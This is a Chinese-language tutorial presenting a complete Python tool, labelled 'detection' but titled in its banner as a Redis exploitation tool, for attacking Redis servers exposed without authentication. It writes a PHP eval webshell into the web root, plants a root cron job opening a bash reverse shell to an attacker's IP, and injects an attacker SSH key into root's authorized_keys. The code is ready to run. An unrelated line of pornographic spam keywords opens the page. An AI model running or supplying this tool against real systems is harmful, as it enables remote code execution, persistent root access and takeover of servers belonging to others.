欧美bbbwbbbw肥妇,免费乱码人妻系列日韩,一级黄片

使用python腳本實(shí)現(xiàn)Redis未授權(quán)訪問檢測

 更新時(shí)間:2024年10月08日 11:31:56   作者:2,4(1H,3H)-PD?are?mine  
Redis未授權(quán)訪問漏洞是一種安全漏洞,可能導(dǎo)致未經(jīng)授權(quán)的用戶或攻擊者訪問Redis數(shù)據(jù)庫,甚至修改或刪除其中的數(shù)據(jù),這種漏洞通常發(fā)生在管理員未正確配置Redis實(shí)例的訪問控制和認(rèn)證機(jī)制時(shí),本文介紹了python腳本實(shí)現(xiàn)Redis未授權(quán)訪問漏洞利用,需要的朋友可以參考下

1 測試環(huán)境準(zhǔn)備

CentOS 7(192.168.198.66/24):安裝 Redis 服務(wù)器并用 root 權(quán)限開啟服務(wù),關(guān)閉保護(hù)模式;安裝并開啟 httpd 服務(wù);開啟 ssh 服務(wù)。

Kali(192.168.198.172/24):測試腳本效果,模擬攻擊機(jī)。

Win10:VS Code開發(fā)腳本,Xshell控制虛擬機(jī)。

2 未授權(quán)訪問檢測

首先需要檢測 6379 端口是否開啟,直接使用 socket 連接測試即可,is_port_open() 函數(shù)實(shí)現(xiàn)檢測端口開啟情況。

def is_port_open(host,port):
    s=socket.socket()
    s.settimeout(0.3)
    try:
        s.connect((host,port))
    except Exception as e:
        return False
    else:
        return True
    finally:
        s.close()

 然后嘗試連接 Redis 服務(wù)器,這里用到redis模塊中的StrictRedis(host,port,socket_timeout),通過client_list() 方法獲取客戶列表查看是否連接成功。如果成功連接到 Redis 服務(wù)器, client_list() 的調(diào)用就不會(huì)拋出異常。

try:
    client = redis.StrictRedis(host=ip, port=port, socket_timeout=0.3)
    ok_lst = client.client_list()
    print('[+] Connected to the Redis server successfully...')
except Exception as e:
    print(f'[-] An unexpected error occurred: {e}')

3 寫入webshell

Redis命令:

config set dir /var/www/html
config set dbfilename shell.php
set x "<?php @eval($_POST[123]); ?>"
save

對應(yīng)的 redis 模塊的方法:

client.config_set('dir','/var/www/html')
client.config_set('dbfilename','shell.php')
client.set('x','<?php @eval($_POST[123]); ?>')
client.save()

增加設(shè)置根目錄一句話木馬名稱和密碼功能:

def Webshell(client):
    try:
        df_dir='/var/www/html'
        web_dir=input('Please enter the root directory of the target machine\'s website, input nothing to use the default path: /var/www/html\n')
        web_dir=web_dir.strip()
        if not web_dir: web_dir=df_dir
        name=input('Please enter the name of the PHP file you want to upload: ')
        passwd=input('Please enter the connection password: ')
        client.config_set('dir',web_dir)
        client.config_set('dbfilename',name+'.php')
        client.set('x','<?php @eval($_POST['+passwd+']); ?>')
        client.save()
        print("[+] Webshell "+name+".php"+" uploaded successfully...")
    except Exception as e:
        print(f"[-] Webshell upload failed: {e}")

4 建立反彈連接

同理,這里利用定時(shí)任務(wù)實(shí)現(xiàn)反彈連接。先設(shè)置 Redis 數(shù)據(jù)庫目錄到系統(tǒng)定時(shí)任務(wù)目錄,名字設(shè)置為 root (相當(dāng)于修改 root 用戶的定時(shí)任務(wù)),增加用戶設(shè)定 IP 和端口監(jiān)聽功能。

def Reverse(client):
    try:
        client.config_set('dir','/var/spool/cron')
        client.config_set('dbfilename','root')
        ip=input('Set the attacker\'s IP address: ')
        port=input('Set the listening port: ')
        payload='\n* * * * * bash -i >& /dev/tcp/'+ip+'/'+port+' 0>&1\n'
        client.set('x',payload)
        client.save()
        print("[+] Reverse shell task created successfully...")
    except Exception as e:
        print(f"[-] Reverse shell creation failed: {e}")

5 SSH keys 免密登錄

把 Redis 的目錄設(shè)置為 /root/.ssh,保存文件為 authorized_keys,實(shí)現(xiàn)在靶機(jī)中 authorized_keys 寫入攻擊者 ssh 公鑰。

def Ssh(client):
    try:
        sshkey=input('Enter the SSH key you have generated: ')
        client.config_set('dir','/root/.ssh')
        client.config_set('dbfilename','authorized_keys')
        client.set('x','\n\n'+sshkey+'\n\n')
        client.save()
        print("[+] SSH key injected successfully.")
    except Exception as e:
        print(f"[-] SSH key injection failed: {e}")

6 完整代碼

import numpy as np
import socket
import redis
import sys
def Hello_FK_Redis():
    a,b=60,30
    x,y,r=30,15,13
    img=np.zeros((b,a),dtype=str)
    for i in range(b):
        for j in range(a):
            dist=np.sqrt((i-y)**2+(j-x)**2)
            if r-1<dist<r+1: img[i,j]='*'
            elif abs(j-x)<1 and dist<r: img[i,j]='|'
            elif abs(i-y)<1 and dist<r: img[i,j]='-'
    img[img=='']=' '
    for i in img: print(''.join(i))
    print('----Welcome to use Redis Vulnerability Exploitation Tool----')
def is_port_open(host,port):
    s=socket.socket()
    s.settimeout(0.3)
    try:
        s.connect((host,port))
    except Exception as e:
        return False
    else:
        return True
    finally:
        s.close()
def Webshell(client):
    try:
        df_dir='/var/www/html'
        web_dir=input('Please enter the root directory of the target machine\'s website, input nothing to use the default path: /var/www/html\n')
        web_dir=web_dir.strip()
        if not web_dir: web_dir=df_dir
        name=input('Please enter the name of the PHP file you want to upload: ')
        passwd=input('Please enter the connection password: ')
        client.config_set('dir',web_dir)
        client.config_set('dbfilename',name+'.php')
        client.set('x','<?php @eval($_POST['+passwd+']); ?>')
        client.save()
        print("[+] Webshell "+name+".php"+" uploaded successfully...")
    except Exception as e:
        print(f"[-] Webshell upload failed: {e}")
 
def Reverse(client):
    try:
        client.config_set('dir','/var/spool/cron')
        client.config_set('dbfilename','root')
        ip=input('Set the attacker\'s IP address: ')
        port=input('Set the listening port: ')
        ip=ip.strip()
        port=port.strip()
        payload='\n* * * * * bash -i >& /dev/tcp/'+ip+'/'+port+' 0>&1\n'
        client.set('x',payload)
        client.save()
        print("[+] Reverse shell task created successfully...")
    except Exception as e:
        print(f"[-] Reverse shell creation failed: {e}")
def Ssh(client):
    try:
        sshkey=input('Enter the SSH key you have generated: ')
        client.config_set('dir','/root/.ssh')
        client.config_set('dbfilename','authorized_keys')
        client.set('x','\n\n'+sshkey+'\n\n')
        client.save()
        print("[+] SSH key injected successfully.")
    except Exception as e:
        print(f"[-] SSH key injection failed: {e}")
if __name__ == '__main__':
    Hello_FK_Redis()
    ip=input('Please enter the target machine\'s IP address: ')
    port=6379
    if is_port_open(ip,port):
        print('[+] Port 6379 is open...')
        print('[*] Trying to connect Redis server...')
        try:
            client=redis.StrictRedis(host=ip,port=port,socket_timeout=0.3)
            ok_lst=client.client_list()
            print('[+] Connected to the Redis server successfully...')
            print('Please choose the exploit method you want to use:\nEnter 1 for webshell\nEnter 2 for establishing a reverse connection\nEnter 3 for SSH key-based authentication\nOr any other character to exit...')
            try:
                c=int(input())
                if c==1: Webshell(client)
                elif c==2: Reverse(client)
                elif c==3: Ssh(client)
                else: 
                    print('[*] Exiting...')
                    sys.exit()
            except Exception:
                print('[*] Exiting...')
                sys.exit()
        except Exception as e:
            print(f'[-] An unexpected error occurred: {e}')
 
    else:
        print('[-] Port 6379 is not open...')
 

7 測試效果 webshell

反彈連接

監(jiān)聽端口:7777

下面輸入攻擊機(jī)端口保證與監(jiān)聽的攻擊機(jī)和端口一致:

免密登錄

在 kali 中 .ssh 復(fù)制公鑰 id_rsa.pub 的內(nèi)容

免密登錄:

以上就是使用python腳本實(shí)現(xiàn)Redis未授權(quán)訪問檢測的詳細(xì)內(nèi)容,更多關(guān)于python Redis未授權(quán)訪問檢測的資料請關(guān)注腳本之家其它相關(guān)文章!

相關(guān)文章

  • Python中的random.uniform()函數(shù)教程與實(shí)例解析

    Python中的random.uniform()函數(shù)教程與實(shí)例解析

    今天小編就為大家分享一篇關(guān)于Python中的random.uniform()函數(shù)教程與實(shí)例解析,小編覺得內(nèi)容挺不錯(cuò)的,現(xiàn)在分享給大家,具有很好的參考價(jià)值,需要的朋友一起跟隨小編來看看吧
    2019-03-03
  • Python實(shí)現(xiàn)PS圖像調(diào)整顏色梯度效果示例

    Python實(shí)現(xiàn)PS圖像調(diào)整顏色梯度效果示例

    這篇文章主要介紹了Python實(shí)現(xiàn)PS圖像調(diào)整顏色梯度效果,結(jié)合實(shí)例形式分析了Python實(shí)現(xiàn)PS圖像調(diào)整中顏色梯度的原理與相關(guān)操作技巧,需要的朋友可以參考下
    2018-01-01
  • Python基于面向?qū)ο笞鲆粋€(gè)文件夾整理工具

    Python基于面向?qū)ο笞鲆粋€(gè)文件夾整理工具

    這篇文章主要給大家介紹了Python基于面向?qū)ο笞鲆粋€(gè)文件夾整理工具,文中的示例代碼講解詳細(xì),具有一定的參考價(jià)值,感興趣的小伙伴可以跟隨小編一起學(xué)習(xí)一下
    2024-02-02
  • python tkinter Entry控件的焦點(diǎn)移動(dòng)操作

    python tkinter Entry控件的焦點(diǎn)移動(dòng)操作

    這篇文章主要介紹了python tkinter Entry控件的焦點(diǎn)移動(dòng)操作,具有很好的參考價(jià)值,希望對大家有所幫助。如有錯(cuò)誤或未考慮完全的地方,望不吝賜教
    2021-05-05
  • Python datetime包函數(shù)簡單介紹

    Python datetime包函數(shù)簡單介紹

    這篇文章主要介紹了Python datetime包函數(shù)簡單介紹,文中通過示例代碼介紹的非常詳細(xì),對大家的學(xué)習(xí)或者工作具有一定的參考學(xué)習(xí)價(jià)值,需要的朋友可以參考下
    2019-08-08
  • Python實(shí)現(xiàn)將一段文字復(fù)制到所選的文件當(dāng)中

    Python實(shí)現(xiàn)將一段文字復(fù)制到所選的文件當(dāng)中

    這篇文章主要為大家詳細(xì)介紹了Python如何將一段文字復(fù)制到所選的文件當(dāng)中,文中的示例代碼講解詳細(xì), 感興趣的小伙伴可以跟隨小編一起學(xué)習(xí)一下
    2025-02-02
  • Python ArgumentParse的subparser用法說明

    Python ArgumentParse的subparser用法說明

    這篇文章主要介紹了Python ArgumentParse的subparser用法說明,具有很好的參考價(jià)值,希望對大家有所幫助。一起跟隨小編過來看看吧
    2020-04-04
  • Django框架獲取form表單數(shù)據(jù)方式總結(jié)

    Django框架獲取form表單數(shù)據(jù)方式總結(jié)

    這篇文章主要介紹了Django框架獲取form表單數(shù)據(jù)方式總結(jié),文中通過示例代碼介紹的非常詳細(xì),對大家的學(xué)習(xí)或者工作具有一定的參考學(xué)習(xí)價(jià)值,需要的朋友可以參考下
    2020-04-04
  • numpy中tensordot的用法

    numpy中tensordot的用法

    本文主要介紹了numpy中tensordot的用法,文中通過示例代碼介紹的非常詳細(xì),對大家的學(xué)習(xí)或者工作具有一定的參考學(xué)習(xí)價(jià)值,需要的朋友們下面隨著小編來一起學(xué)習(xí)學(xué)習(xí)吧
    2023-02-02
  • Django前端BootCSS實(shí)現(xiàn)分頁的方法

    Django前端BootCSS實(shí)現(xiàn)分頁的方法

    本文主要介紹了Django前端BootCSS實(shí)現(xiàn)分頁的方法,文中通過示例代碼介紹的非常詳細(xì),具有一定的參考價(jià)值,感興趣的小伙伴們可以參考一下
    2021-11-11

最新評(píng)論